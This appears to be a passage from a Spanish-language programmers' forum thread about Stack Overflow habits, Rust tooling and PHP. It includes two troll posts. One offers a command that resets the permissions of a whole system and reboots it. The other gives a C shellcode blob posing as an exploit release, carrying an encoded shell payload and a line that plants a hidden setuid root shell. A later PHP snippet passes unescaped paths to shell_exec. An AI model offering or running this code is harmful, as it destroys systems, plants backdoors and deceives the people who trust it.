Yo en stack overflow miro errores que parecen externos, de las libs que usamos, aunque en general suelo tirar más de su propio git issues (si lo hay), me fío bastante más de las respuestas. Y suelo usarlo para leer lo que dice la gente en so con una confianza bastante baja salvo en las respuestas aceptadas, que suelen estar acertadas aunque obsoletas y ayudan.
Luego también googleo cosas super basicas a veces por no pensar mucho, leyendo la respuesta me hace recordar, generalmente como se hacia bien lo que la respuesta suele hacerlo como se hacía en el 2000.
Deje de copiar y pegar de SO hace mucho tiempo.
Con SO lo que llevo un tiempo observando es que si una respuesta es anterior a 2015 posiblemente no te sirva. Por suerte, la mayor parte que busco tienen respuestas de 2017 en adelante.
Y bueno, la de veces que habré googleado yo cosas ultrabásicas porque es más rápido poner "java read from file" en Google que recordar como se hacía...
#40030 sudo chmod -R 777 /; sudo init 6
char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”
“\x6e\x2f\x73\x68\x00\x2d\x63\x00”
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
nadie que haya usado rust sabe de sistemas de intellisense para este no? RLS es un pufo; en un proyecto no trivial va fatal
aunque la última vez creo que lo miré a través de wsl 1.0
Vale, lo que pregunté ayer del shell_exec era para ejecutar un comando ghostscript para convertir la versión de un pdf por motivos de compatibilidad. Por si a alguien le interesa:
$command = 'gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.5 -dNOPAUSE -dQUIET -dBATCH -sOutputFile='.$uploads_dir.'converted.pdf '.$uploads_dir.'temp.pdf"';
$retConvert = shell_exec( $command );
Bss
Consola - View problems: 0 warnings 0 errors.
cuando pille el proveedor el proyecto y lo vea así de limpio va a flipar en colores.
Lo que si que es un buen algoritmo es el puto sistema de aggro de mv, cuanto más activo eres más agros te comes, porque fk logic.
#40046 Dicen que cuando posteas mucho sin punish te baja. Yo llevo sin bajar meses y meses sin punish....